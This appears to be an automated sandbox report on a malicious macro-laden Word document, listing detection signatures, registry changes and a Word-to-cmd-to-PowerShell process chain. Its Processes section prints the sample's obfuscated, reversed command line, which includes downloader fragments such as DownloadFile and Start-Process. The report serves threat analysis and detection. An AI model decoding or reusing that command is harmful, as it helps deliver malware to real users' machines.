Malware Analysis Report

2024-10-16 06:28

Sample ID 240527-k365tsef4y
Target 78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118
SHA256 6d065101c82387e4d45dc8df1cd0f0c2ac088407908d4fed319a7ea10e9e17cc
Tags
macro macro_on_action execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6d065101c82387e4d45dc8df1cd0f0c2ac088407908d4fed319a7ea10e9e17cc

Threat Level: Known bad

The file 78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action execution

Process spawned unexpected child process

Blocklisted process makes network request

Suspicious Office macro

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

Drops file in Windows directory

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 09:08

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious Office macro

macro
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 09:08

Reported

2024-05-27 09:11

Platform

win7-20240221-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1664 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1664 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1664 wrote to memory of 2440 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1664 wrote to memory of 2844 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 1664 wrote to memory of 2844 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 1664 wrote to memory of 2844 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 1664 wrote to memory of 2844 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\cmd.exe

cmd /c cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ 